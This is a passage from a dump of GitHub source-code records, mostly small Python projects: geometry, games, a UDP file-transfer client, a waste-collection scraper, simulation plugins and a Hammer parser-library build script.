ptB)):\n return True\n\n # ptA, ptB and ptD are colinear and ptD lies on segment ptAptB\n if (o2 == 0 and onSegment(ptA, ptD, ptB)): \n return True\n\n # ptC, ptD and ptA are colinear and ptA lies on segment ptCptD\n if (o3 == 0 and onSegment(ptC, ptA, ptD)): \n return True\n\n # ptC, ptD and ptB are colinear and ptB lies on segment ptCptD\n if (o4 == 0 and onSegment(ptC, ptB, ptD)): \n return True\n\n return False\n\n\ndef increaseSizeOfPolygon(targetPoints, xinc, yinc):\n increasedPoints = list()\n for ptTuple in targetPoints:\n x = float(ptTuple[0]) + xinc\n y = float(ptTuple[1]) + yinc\n increasedPoints.append((x, y))\n return increasedPoints\n\n\ndef doPiecesIntersectTarget(pieces, targetPoints):\n tgPtLength = len(targetPoints)\n for key in pieces:\n ptList = pieces[key]\n length = len(ptList)\n\n for i in range(0, length+1):\n ptA = ptList[i % length]\n ptB = ptList[(i+1) % length]\n\n for j in range(0, tgPtLength+1):\n j = j % tgPtLength\n ptC = targetPoints[j]\n ptD = targetPoints[(j+1) % tgPtLength]\n\n # if doIntersect(ptA, ptB, ptC, ptD):\n # return True\n\n det0, det1 = 0, 0\n det0 = checkOrientationFor2Points(ptA, ptB, ptC)\n det1 = checkOrientationFor2Points(ptA, ptB, ptD)\n\n if det0 != det1 != 0 :\n det0 = checkOrientationFor2Points(ptC, ptD, ptA)\n det1 = checkOrientationFor2Points(ptC, ptD, ptB)\n\n if det0 != det1 and det1 != 0 and det0 != 0:\n return True\n\n else:\n continue\n return False\n\ndef available_coloured_pieces(file):\n coloured_pieces = dict()\n coloured_pieces = readFile(file)\n return coloured_pieces\n\n\ndef closed_segment_intersect(a, b, c, d):\n \"\"\" Verifies if closed segments a, b, c, d do intersect.\n \"\"\"\n if a == b:\n return a == c or a == d\n if c == d:\n return c == a or c == b\n\n s1 = side(a, b, c)\n s2 = side(a, b, d)\n\n # All points are collinear\n if s1 == 0 and s2 == 0:\n return \\\n is_point_in_closed_segment(a, b, c) or is_point_in_closed_segment(a, b, d) or \\\n is_point_in_closed_segment(\n c, d, a) or is_point_in_closed_segment(c, d, b)\n\n # No touching and on the same side\n if s1 and s1 == s2:\n return False\n\n s1 = side(c, d, a)\n s2 = side(c, d, b)\n\n # No touching and on the same side\n if s1 and s1 == s2:\n return False\n\n return True\n\n# file = open('shape_A_1.xml')\n# shape = available_coloured_pieces(file)\n# file = open('tangram_A_2_a.xml')\n# tangram = available_coloured_pieces(file)\n# print(is_solution(tangram, shape))\n","repo_name":"yashtamakuwala/Tangram","sub_path":"tangram.py","file_name":"tangram.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73409321067","text":"import sys\ninput = sys.stdin.readline\n\nn,m=map(int,input().split())\n\ndef backtracking(start,end,l,m):\n for i in range(start,end+1):\n if m == len(l) + 1:\n temp = l[:]\n temp.append(i)\n for j in temp:\n print(j,end=\" \")\n print()\n else:\n temp = l[:]\n temp.append(i)\n backtracking(i,end,temp,m)\n\nbacktracking(1,n,[],m)","repo_name":"Yun-YeoJun/BOJ_Python","sub_path":"solutions/bj15652.py","file_name":"bj15652.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35123215146","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.command_lib.storage import tracker_file_util\nfrom googlecloudsdk.command_lib.storage.tasks import task\nfrom googlecloudsdk.command_lib.storage.tasks.cp import download_util\nfrom googlecloudsdk.command_lib.util import crc32c\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\n\n\nclass FinalizeSlicedDownloadTask(task.Task):\n \"\"\"Performs final steps of sliced download.\"\"\"\n\n def __init__(self,\n source_resource,\n temporary_destination_resource,\n final_destination_resource,\n do_not_decompress=False):\n \"\"\"Initializes task.\n\n Args:\n source_resource (resource_reference.ObjectResource): Should contain\n object's metadata for checking content encoding.\n temporary_destination_resource (resource_reference.FileObjectResource):\n Must contain a local path to the temporary file written to during\n transfers.\n final_destination_resource (resource_reference.FileObjectResource): Must\n contain local filesystem path to the final download destination.\n do_not_decompress (bool): Prevents automatically decompressing\n downloaded gzips.\n \"\"\"\n super(FinalizeSlicedDownloadTask, self).__init__()\n self._source_resource = source_resource\n self._temporary_destination_resource = temporary_destination_resource\n self._final_destination_resource = final_destination_resource\n self._do_not_decompress = do_not_decompress\n\n def execute(self, task_status_queue=None):\n \"\"\"Validates and clean ups after sliced download.\"\"\"\n for message in self.received_messages:\n if message.topic is task.Topic.ERROR:\n log.error(message.payload)\n return\n\n temporary_object_path = (\n self._temporary_destination_resource.storage_url.object_name)\n final_destination_object_path = (\n self._final_destination_resource.storage_url.object_name)\n if (properties.VALUES.storage.check_hashes.Get() !=\n properties.CheckHashes.NEVER.value and\n self._source_resource.crc32c_hash):\n\n component_payloads = [\n message.payload\n for message in self.received_messages\n if message.topic == task.Topic.CRC32C\n ]\n if component_payloads:\n # Returns list of payload values sorted by component number.\n sorted_component_payloads = sorted(\n component_payloads, key=lambda d: d['component_number'])\n\n downloaded_file_checksum = sorted_component_payloads[0][\n 'crc32c_checksum']\n for i in range(1, len(sorted_component_payloads)):\n payload = sorted_component_payloads[i]\n downloaded_file_checksum = crc32c.concat_checksums(\n downloaded_file_checksum,\n payload['crc32c_checksum'],\n b_byte_count=payload['length'])\n\n downloaded_file_hash_object = crc32c.get_crc32c_from_checksum(\n downloaded_file_checksum)\n downloaded_file_hash_digest = crc32c.get_hash(\n downloaded_file_hash_object)\n\n download_util.validate_download_hash_and_delete_corrupt_files(\n temporary_object_path, self._source_resource.crc32c_hash,\n downloaded_file_hash_digest)\n\n download_util.decompress_or_rename_file(\n self._source_resource,\n temporary_object_path,\n final_destination_object_path,\n do_not_decompress_flag=self._do_not_decompress)\n\n tracker_file_util.delete_download_tracker_files(\n self._temporary_destination_resource.storage_url)\n","repo_name":"boostcampaitech2/final-project-level3-cv-15","sub_path":"serving/google-cloud-sdk/lib/googlecloudsdk/command_lib/storage/tasks/cp/finalize_sliced_download_task.py","file_name":"finalize_sliced_download_task.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3667393559","text":"import time, pygame, sys, threading, random, json\nimport Adafruit_Nokia_LCD as LCD\nimport Adafruit_GPIO.SPI as SPI\nfrom pygame.locals import *\nfrom PIL import Image, ImageDraw, ImageFont\n\n\ndef draw_main_menu():\n #option currently chosen\n draw.rectangle((0,0,LCD.LCDWIDTH-1, LCD.LCDHEIGHT-1), outline=0, fill=255)\n font = ImageFont.truetype(\"data-latin.ttf\", size=12)\n draw.text((19,3), 'SNAKE', font=font)\n draw.text((20,17), '2048', font=font)\n draw.text((20,31), 'QUIT', font=font)\n return get_option()\n \n\ndef get_option():\n option = 0\n points =[(3, 14*option+9), (4, 14*option+9), (5, 14*option+9),\n (6, 14*option+9), (5, 14*option+8), (5, 14*option+10)]\n draw.point(points, fill=0)\n disp.image(image)\n disp.display()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == pygame.K_UP:\n draw.point(points, fill=255)\n option = (option-1)%3\n points =[(3, 14*option+9), (4, 14*option+9),\n (5, 14*option+9),(6, 14*option+9),\n (5, 14*option+8), (5, 14*option+10)]\n draw.point(points, fill=0)\n disp.image(image)\n disp.display()\n if event.key == pygame.K_DOWN:\n draw.point(points, fill=255)\n option = (option+1)%3\n points =[(3, 14*option+9), (4, 14*option+9),\n (5, 14*option+9),(6, 14*option+9),\n (5, 14*option+8), (5, 14*option+10)]\n draw.point(points, fill=0)\n disp.image(image)\n disp.display()\n if event.key == pygame.K_RETURN:\n return option\n # w zaleznosci od opcji wyswietl 14*options +9\n time.sleep(0.2)\n\n\ndef start():\n while True: \n opcja = draw_main_menu()\n if opcja == 0:\n import snejk\n #zamien snejka na klase\n snejk.Snejk(disp,draw,image)\n elif opcja == 1:\n import true2048\n t = true2048.TwoZeroFourEight(disp, draw, image)\n else:\n pygame.quit()\n sys.exit()\n \n \npygame.init()\nscreen = pygame.display.set_mode((101,101))\npygame.display.set_caption('.')\npygame.event.set_allowed(None)\npygame.event.set_allowed([QUIT, KEYDOWN])\n#initialize display\n#20 -- D/C\n#12 -- RST\n \nDC = 20\nRST = 12\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = LCD.PCD8544(DC, RST, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE,\n max_speed_hz=4000000))\ndisp.begin(contrast = 50)\ndisp.clear()\ntime.sleep(2)\ndisp.display()\n\nimage = Image.new('1', (LCD.LCDWIDTH, LCD.LCDHEIGHT))\ndraw = ImageDraw.Draw(image)\n\n#draw rectangle\ndraw.rectangle((0,0,LCD.LCDWIDTH-1, LCD.LCDHEIGHT-1), outline=0, fill=255)\nstart()\n","repo_name":"AjEmLewy/RaspberryPiNokiaGames","sub_path":"gamepack.py","file_name":"gamepack.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10207421016","text":"def split(inF):\n inFile = open(inF)\n ouFile1 = open(inF.split('.txt')[0] + '.intron.txt', 'w')\n ouFile2 = open(inF.split('.txt')[0] + '.other.txt', 'w')\n head = inFile.readline()\n ouFile1.write(head)\n ouFile2.write(head)\n for line in inFile:\n fields = line.split('\\t')\n if fields[8] in ['INTRON','DOWNSTREAM', 'UPSTREAM', 'INTRAGENIC']:\n ouFile1.write(line)\n else:\n ouFile2.write(line)\n \n inFile.close()\n ouFile1.close()\n ouFile2.close()\n\nsplit('Variation-All_ACEonly.txt')\n","repo_name":"chw333/StanfordSGTC","sub_path":"DCM/04-Gene/vsACE/04-split.py","file_name":"04-split.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70773017066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWell-mixed topology in which each node is a neighbor of every other node.\n\nThis topology is modeled as a graph with no edges between the nodes. Although\na complete graph would perhaps model a well-mixed topology more accurately,\nthis would prohibit large populations due to the associated memory\nrequirements.\n\nNodes are given a randomly-assigned location to more easily allow for\nvisualization. It should be noted that in this topology, interactions\nare not localized, so the neighbors with which a node interacts will\nbe located throughout the environment.\n\n\"\"\"\n\n__author__ = \"Brian Connelly \"\n__credits__ = \"Brian Connelly\"\n\nimport random\nimport networkx as nx\n\nfrom seeds.Plugin import *\nfrom seeds.SEEDSError import *\nfrom seeds.Topology import *\n\n\nclass WellMixedTopology(Topology, Plugin):\n \"\"\"\n Well-mixed topology with a configurable number of interactions\n\n Configuration: All configuration options should be specified in the\n WellMixedTopology block (unless otherwise specified by the\n config_section parameter).\n\n size\n Total number of nodes in the population\n num_interactions\n When a node is updated, a list of neighbors is passed to it.\n This parameter specifies the size of a random subset of nodes\n to be used as this neighbor set. By default, all nodes in\n the populaion are passed as neighbors.\n dimensions\n The number of dimensions in space that this topology occupies.\n (default: 2)\n\n Example:\n [WellMixedTopology]\n size = 100000\n num_interactions = 10\n\n\n \"\"\"\n\n __name__ = \"WellMixedTopology\"\n __version__ = (1,0)\n __author__ = \"Brian Connelly \"\n __credits__ = \"Brian Connelly\"\n __description__ = \"Well-mixed (unstructured) population in which each node is equally likely to interact with any other node.\"\n __type__ = 2 \n __requirements__ = []\n\n def __init__(self, experiment, label=None):\n \"\"\"Initialize a WellMixedTopology object\n\n Parameters:\n\n *experiment*\n A reference to the Experiment\n *label*\n A unique string identifying the configuration for this topology\n\n \"\"\"\n\n super(WellMixedTopology, self).__init__(experiment, label=label)\n\n if self.label:\n self.config_section=\"%s:%s\" % (\"WellMixedTopology\", label)\n else:\n self.config_section=\"%s\" % (\"WellMixedTopology\")\n\n self.size = self.experiment.config.getint(section=self.config_section,\n name='size')\n self.num_interactions = self.experiment.config.getint(section=self.config_section,\n name='num_interactions',\n default=self.size)\n self.dimensions = self.experiment.config.getint(section=self.config_section,\n name=\"dimensions\",\n default=2)\n if not self.size:\n raise ConfigurationError(\"WellMixedTopology: size must be defined\")\n elif self.size < 1:\n raise ConfigurationError(\"WellMixedTopology: size must be greater than 0\")\n elif self.num_interactions < 0:\n raise ConfigurationError(\"WellMixedTopology: num_interactions must be non-negative\")\n elif self.num_interactions > self.size:\n raise ConfigurationError(\"WellMixedTopology: num_interactions can not exceed size\")\n elif self.dimensions < 1:\n raise ConfigurationError(\"GrowthTopology: Number of dimensions must be at least 1\")\n\n self.graph = nx.empty_graph()\n self.graph.name = \"well_mixed_graph\"\n self.graph.add_nodes_from(list(range(self.size)))\n\n for n in self.graph.nodes():\n self.graph.node[n]['coords'] = tuple([random.random() for i in xrange(self.dimensions)])\n\n def __str__(self):\n \"\"\"Produce a string to be used when an object is printed\"\"\"\n return \"Well-Mixed Topology (%d nodes, %d interactions)\" % (self.size, self.num_interactions)\n\n def get_neighbors(self, node):\n \"\"\"Get a randomly-selected list of neighboring nodes (IDs) for a given node\n\n Parameters:\n\n *node*\n The ID of the node whose neighboring nodes to get\n\n \"\"\"\n\n return random.sample(self.graph.nodes(), self.num_interactions)\n\n def add_edge(self, src, dest):\n \"\"\"Add an edge to the graph. Not supported by this topology type\"\"\"\n raise ConfigurationError(\"add_edge is not supported by WellMixedTopology\")\n return\n\n def remove_edge(self, src, dest):\n \"\"\"Remove an edge from the graph. Not supported by this topology\n type\"\"\"\n raise ConfigurationError(\"remove_edge is not supported by WellMixedTopology\")\n return\n\n def add_node(self, id=-1, neighbors=[]):\n \"\"\"Add a node to the graph. Topologies that do not wish to support\n this should redefine this method to do nothing. This method will\n not place a Cell or ResourceCell in the newly-created node. That\n will need to be done separately.\n\n Note that since edges aren't used in this topology, the neighbors\n argument is ignored.\n\n Parameters:\n\n id\n The ID to use for the new node. If none is specified (or -1), the\n ID used will be the current largest ID in the graph plus 1.\n neighbors\n An optional list of node IDs that will be connected to the new node\n via an edge. NonExistentNodeError will be raised if any of these\n nodes do not exist. ***This argument is ignored***\n\n \"\"\"\n\n if id == -1:\n self.graph.add_node(max(self.graph.nodes()) + 1)\n else:\n self.graph.add_node(id)\n\n self.graph.node[id]['coords'] = (random.random(),random.random())\n\n","repo_name":"briandconnelly/seeds","sub_path":"seeds/plugins/topology/WellMixedTopology.py","file_name":"WellMixedTopology.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"21897964650","text":"import pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport mplfinance as fplt\nimport pandas as pd\nfrom datetime import datetime as dt\nimport matplotlib.dates as mpdates\n\nplt.ion()\ndts = [ ]\ncdf = pd.read_csv('chart1.csv')\n#cdf = pd.read_csv('market_1H_grey.csv')\nfor row in cdf.itertuples():\n rdt = row.Date + ' ' + row.Time\n dtm = dt.strptime(rdt, \"%m/%d/%Y %H:%M\")\n dts.append(dtm)\n\ncols = ['Open','High','Low','Close']\ndf = cdf[cols]\n\ndti = pd.DatetimeIndex(dts)\ndf.set_index(dti, inplace=True) \n\nprint(df)\n\nfor bar in range(5, len(df)):\n wdf = df[bar-5:bar]\n highest_low = max(wdf['Low'])\n lowest_high = min(wdf['High'])\n if (highest_low > lowest_high):\n continue\n\n fplt.plot(wdf, type='candle', style='charles',\n title='Ovelapping Labelling',\n ylabel='Price ($)')\n\n plt.show(block=False)\n plt.pause(0.001)\n input(\"Overlapping?\");\n plt.close('all')\n","repo_name":"karlfe/trading","sub_path":"chart/ovrlp_label.py","file_name":"ovrlp_label.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25605484111","text":"import socket\nimport sys\nimport time\n\n# Base variables and consts.\nIP_ADDR = sys.argv[2]\nPORT = int(sys.argv[1])\nFILE_NAME = sys.argv[3]\nDEFAULT_TIMEOUT = 5\nMSS = 97\nADDR = (IP_ADDR, PORT)\nNULL = b'0'\nFIN_MSG = b'FIN'\nSYN_MSG = b'SYN'\nMAX_PORT = 65535\n\n\n# Data Class - will hold all information of packages needed to be sent and ack received.\nclass Data:\n # Constructor - initialize variables and split file into small chunks.\n def __init__(self, file_name):\n try:\n data = open(file_name, \"rb\").read()\n except OSError:\n print(\"Cannot open or read file\")\n s.close()\n sys.exit()\n # Make new array of bytes from current file, to each segment add 3-byte long sequence number.\n self.data_arr = [(data[i:i + MSS] + int((i / MSS)).to_bytes(3, 'little')) for i in range(0, len(data), MSS)]\n # Size of the array.\n self.arr_size_bytes = (len(self.data_arr)).to_bytes(3, 'little')\n # Counter to hold the amount of packages received.\n self.received_coutner = 0\n\n # Iterator made for giving the next package in line that did not received ack for.\n def __iter__(self):\n self.iter = 0\n return self\n\n def __next__(self):\n # While we didn't reach the end of the array look for a package that have not received ack for.\n while self.iter < len(self.data_arr):\n # if found return it.\n if self.data_arr[self.iter] != NULL:\n temp = self.iter\n self.iter += 1\n return self.data_arr[temp]\n self.iter += 1\n raise StopIteration\n\n # notify_ack - Method will update the current list for the ack received, if new ack will increase received_counter.\n def notify_ack(self, index):\n if self.data_arr[index] != NULL:\n self.data_arr[index] = NULL\n self.received_coutner += 1\n\n # get_size - as simple as it gets, returns size.\n def get_size(self):\n return self.arr_size_bytes\n\n # done_acking - returns true if all acks has been received, otherwise false.\n def done_acking(self):\n if self.received_coutner == len(self.data_arr):\n return True\n return False\n\n\n# Sync method will be in charge of synchronizing connection with the server.\ndef syn():\n syn_msg = SYN_MSG + data_toSend.get_size()\n s.sendto(syn_msg, (IP_ADDR, PORT))\n # 2 ways handshake as the server is not communicating back but only receives data and approves it.\n try:\n get_syn, addr = s.recvfrom(100)\n if get_syn != syn_msg:\n syn()\n else:\n send_pkgs()\n except socket.timeout:\n # in-case of drop re-send package.\n syn()\n\n\n# will be in-charge of sending the packages that has not received ack yet.\ndef send_pkgs():\n for pkg in data_toSend:\n s.sendto(pkg, ADDR)\n mark_acks()\n\n\n# will be in-charge of checking which acks have been received and marking the packages for future sending.\ndef mark_acks():\n try:\n # while still un-resolved packages in buffer keep marking them.\n while True:\n data_ack, address = s.recvfrom(100)\n # if message is fin message go to fin and finish the connection.\n if data_ack == FIN_MSG:\n fin()\n # if syn message was found again meaning sever did not receive last one, client will resend it.\n if data_ack == SYN_MSG:\n syn()\n # otherwise store the ack received and mark the pacakge.\n pkg_num = int.from_bytes(data_ack[-3:len(data_ack)], 'little')\n data_toSend.notify_ack(pkg_num)\n\n except socket.timeout:\n if not data_toSend.done_acking():\n send_pkgs()\n\n\n# fin method will be in-charge to finish comunication with the server.\ndef fin():\n try:\n s.sendto(FIN_MSG, (IP_ADDR, PORT))\n fin_ack, address = s.recvfrom(100)\n if fin_ack != FIN_MSG:\n fin()\n else:\n s.close()\n sys.exit()\n except socket.timeout:\n fin()\n\n\n# validates IP address's format\ndef validate_ip():\n ip_parts = IP_ADDR.split(\".\")\n\n if len(ip_parts) != 4:\n return False\n\n for part in ip_parts:\n if not isinstance(int(part), int):\n return False\n\n if int(part) < 0 or int(part) > 255:\n return False\n\n return True\n\n\n# checks arguments before staring.\ndef args_check():\n try:\n if MAX_PORT < int(PORT) or int(PORT) < 0:\n raise \"Port is not in the correct range\"\n\n if len(sys.argv) != 4:\n raise \"Wrong amount of arguments.\"\n\n if not validate_ip():\n raise \"Wrong IP address format.\"\n\n except:\n s.close()\n sys.exit()\n\n\n# UDP socket initialisation\nargs_check()\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.settimeout(DEFAULT_TIMEOUT)\n\ndata_toSend = Data(FILE_NAME)\nsyn()\n","repo_name":"Etelis/TCP-over-UDP","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509272208","text":"# Day 6B - how many fish are there at day 256?\n# In theory I could just change my loop from day_6A to run all the way through range(256)...\n# ... but rough math says the loop would take several thousand years to finish.\n# Instead, I'm going to figure out how many fish are generated from one fish in 128 days (for each \"starting status\")\n# Then figure out how many fish are generated in 256 days from one fish\n# Then multiply those estimates by the distribution of actual starting fish to get our final.\n\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('data/day6.csv', header = None)\nschool_of_fish = data.iloc[0].values.tolist()\n\n# Get a dictionary with the initial distribution by 'day count status'\ninitial_distribution = np.unique(school_of_fish, return_counts = True)\ninitial_distribution = dict(zip(*initial_distribution))\n\n# Map out how many fish are generated by one fish of each 'day count status' and the distribution of those fish\nmapping_128 = {}\nfor i in range(9):\n example_schools = [i]\n for day in range(128):\n new_school = []\n for oldfish in example_schools:\n fish = example_schools.pop(0)\n if fish == 0:\n new_school.append(8)\n example_schools.append(6)\n\n else:\n fish -= 1\n example_schools.append(fish)\n\n for each in new_school:\n example_schools.append(each)\n\n summary = np.unique(example_schools, return_counts = True)\n summary = dict(zip(*summary))\n\n mapping_128[i] = (summary)\n\n# Translate the mapping into a total generated population from each initial fish\nmapping_totals_128 = {}\nfor i in range(9):\n mapping_totals_128[i] = sum(mapping_128[i].values())\n\n# Translate these 128 day figures into 256 (basically figure out the generated population from each fish at 128 days)\ntotal_fish_256 = {}\nfor i in range(9):\n temp_fish = []\n for j in range(9):\n try:\n temp_fish.append(mapping_totals_128[j] * mapping_128[i][j])\n except:\n pass\n total_fish_256[i] = sum(temp_fish)\n\n# Okay, now that I know how many fish are generated by a starting fish of each day status, I can calculate the total fish\nfinal_fish = []\nfor i in range(6):\n try:\n final_fish.append(initial_distribution[i] * total_fish_256[i])\n except:\n pass\n\n# Et voila\nprint(sum(final_fish))\n","repo_name":"conordurkin/adventofcode21","sub_path":"day_6B.py","file_name":"day_6B.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26232474698","text":"\"\"\"\nA matrix will be an N sized list of 4 element lists.\nEach individual list will represent an [x, y, z, 1] point.\nFor multiplication purposes, consider the lists like so:\nx0 x1 xn\ny0 y1 yn\nz0 z1 ... zn\n1 1 1\n\"\"\"\nimport math\n\n#print the matrix such that it looks like\n#the template in the top comment\ndef print_matrix( matrix ):\n s = \"\"\n current_spaces = 5\n for c in range(len(matrix[0])):\n s += \"\\n\"\n for r in range(len(matrix)):\n s += str(matrix[r][c])\n # if current_spaces < how_manyDigits(matrix[r][c]):\n # current_spaces += 1\n for i in range(current_spaces - how_manyDigits(matrix[r][c])):\n s += \" \"\n s += \"\\n\"\n print(s)\n\ndef how_manyDigits(n):\n if (n == 0):\n return 1\n i = 0\n number_of_digits = 0\n for i in range(10):\n if (10 ** i) <= n:\n number_of_digits += 1\n return number_of_digits\n\n # for rows in matrix:\n # print(rows)\n\n#turn the paramter matrix into an identity matrix\n#you may assume matrix is square\ndef ident( matrix ):\n columns = len(matrix[0])\n rows = columns #matrix is assumed to be a square\n for r in range(rows):\n for c in range(columns):\n if (r == c):\n matrix[r][c] = 1\n else:\n matrix[r][c] = 0\n return matrix\n\n#multiply m1 by m2, modifying m2 to be the product\n#m1 * m2 -> m2\n\n\ndef matrix_mult( m1, m2 ):\n rows = len(m1[0])\n columns = len(m2)\n temp = new_matrix(rows, columns)\n for row in range(rows):\n for col in range(columns):\n temp[col][row] = sum([(m1[k][row] * m2[col][k]) for k in range(len(m2[0]))])\n del m2[:]\n for col in temp:\n m2.append(col)\n\n\ndef new_matrix(rows = 4, cols = 4):\n m = []\n for c in range( cols ):\n m.append( [] )\n for r in range( rows ):\n m[c].append( 0 )\n return m\n","repo_name":"Silianglei/matrixX","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146095468","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\nfrom waste_collection_schedule.service.ICS import ICS\n\nTITLE = \"Abfallwirtschaftsbetrieb Esslingen\"\nDESCRIPTION = \"Source for AWB Esslingen, Germany\"\nURL = \"https://www.awb-es.de\"\n\nTEST_CASES = {\n \"Aichwald\": {\"city\": \"Aichwald\", \"street\": \"Alte Dorfstrasse\"},\n \"Kohlberg\": {\"city\": \"Kohlberg\", \"street\": \"alle Straßen\"},\n}\n\nHEADERS = {\"user-agent\": \"Mozilla/5.0 (xxxx Windows NT 10.0; Win64; x64)\"}\n\n\nclass Source:\n def __init__(self, city, street=None):\n self._city = city\n self._street = street\n self._ics = ICS()\n\n def fetch(self):\n session = requests.Session()\n\n params = {\n \"city\": self._city,\n \"street\": self._street,\n \"direct\": \"true\",\n }\n r = session.get(\n \"https://www.awb-es.de/abfuhr/abfuhrtermine/__Abfuhrtermine.html\",\n params=params,\n )\n r.raise_for_status()\n\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n downloads = soup.find_all(\"a\", href=True)\n ics_urls = list()\n for download in downloads:\n href = download.get(\"href\")\n if \"t=ics\" in href and href not in ics_urls: #The website lists the same url multiple times, we only want it once\n ics_urls.append(href)\n\n if not ics_urls:\n raise Exception(f\"ics url not found\")\n\n entries = []\n for ics_url in ics_urls:\n # get ics file\n r = session.get(ics_url, headers=HEADERS)\n r.raise_for_status()\n\n # parse ics file\n dates = self._ics.convert(r.text)\n\n for d in dates:\n entries.append(Collection(d[0], d[1]))\n \n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/awb_es_de.py","file_name":"awb_es_de.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"26895941771","text":"# -*- python -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport os.path\n\nImport('env testruns')\n\ndist_headers = [\n 'hammer.h',\n 'allocator.h',\n 'compiler_specifics.h',\n 'glue.h',\n 'internal.h',\n 'platform.h'\n]\n\nparsers_headers = [\n 'parsers/parser_internal.h'\n]\n\nbackends_headers = [\n 'backends/regex.h',\n 'backends/contextfree.h'\n]\n\nparsers = ['parsers/%s.c'%s for s in\n ['action',\n 'and',\n 'attr_bool',\n 'bind',\n 'bits',\n 'butnot',\n 'ch',\n 'charset',\n 'choice',\n 'difference',\n 'end',\n 'endianness',\n 'epsilon',\n 'ignore',\n 'ignoreseq',\n 'indirect',\n 'int_range',\n 'many',\n 'not',\n 'nothing',\n 'optional',\n 'permutation',\n 'sequence',\n 'token',\n 'unimplemented',\n 'whitespace',\n 'xor',\n 'value',\n 'seek']]\n\nbackends = ['backends/%s.c' % s for s in\n ['packrat', 'llk', 'regex', 'glr', 'lalr', 'lr', 'lr0']]\n\nmisc_hammer_parts = [\n 'allocator.c',\n 'benchmark.c',\n 'bitreader.c',\n 'bitwriter.c',\n 'cfgrammar.c',\n 'datastructures.c',\n 'desugar.c',\n 'glue.c',\n 'hammer.c',\n 'pprint.c',\n 'registry.c',\n 'system_allocator.c',\n 'sloballoc.c']\n\nif env['PLATFORM'] == 'win32':\n misc_hammer_parts += [\n 'platform_win32.c',\n 'tsearch.c',\n ]\nelse:\n misc_hammer_parts += ['platform_bsdlike.c']\n\nctests = ['t_benchmark.c',\n 't_bitreader.c',\n 't_bitwriter.c',\n 't_parser.c',\n 't_grammar.c',\n 't_misc.c',\n 't_mm.c',\n 't_regression.c']\n\n\nstatic_library_name = 'hammer'\nbuild_shared_library=True\nif env['PLATFORM'] == 'win32':\n # FIXME(windows): symbols in hammer are not exported yet, a shared lib would be useless\n build_shared_library=False\n # prevent collision between .lib from dll and .lib for static lib\n static_library_name = 'hammer_s'\n\nif 'GPROF' in env and env['GPROF'] == 1:\n # Disable the shared library (it won't work with gprof) and rename the static one\n build_shared_library=False\n static_library_name = 'hammer_pg'\n\nif GetOption('llvm'):\n build_shared_library=False\n static_library_name = 'hammer_ir'\n\n# Markers for later\nlibhammer_static = None\nlibhammer_shared = None\n\nif build_shared_library:\n libhammer_shared = env.SharedLibrary('hammer', parsers + backends + misc_hammer_parts)\nlibhammer_static = env.StaticLibrary(static_library_name, parsers + backends + misc_hammer_parts)\n\nif libhammer_shared is not None:\n Default(libhammer_shared, libhammer_static)\n env.Install('$libpath', [libhammer_static, libhammer_shared])\nelse:\n Default(libhammer_static)\n env.Install('$libpath', [libhammer_static])\n\nenv.Install('$incpath', dist_headers)\nenv.Install('$parsersincpath', parsers_headers)\nenv.Install('$backendsincpath', backends_headers)\nenv.Install('$pkgconfigpath', '../../../libhammer.pc')\n\nif GetOption('with_tests'):\n testenv = env.Clone()\n testenv.ParseConfig('pkg-config --cflags --libs glib-2.0')\n if libhammer_shared is not None:\n testenv.Append(LIBS=['hammer'])\n else:\n testenv.Append(LIBS=[static_library_name])\n testenv.Prepend(LIBPATH=['.'])\n ctestexec = testenv.Program('test_suite', ctests + ['test_suite.c'], LINKFLAGS='--coverage' if testenv.GetOption('coverage') else None)\n ctest = Alias('testc', [ctestexec], ''.join(['env LD_LIBRARY_PATH=', os.path.dirname(ctestexec[0].path), ' ', ctestexec[0].path]))\n AlwaysBuild(ctest)\n testruns.append(ctest)\n\nif libhammer_shared is not None:\n Export('libhammer_static libhammer_shared')\nelse:\n Export('libhammer_static')\n\nfor b in env['bindings']:\n env.SConscript(['bindings/%s/SConscript' % 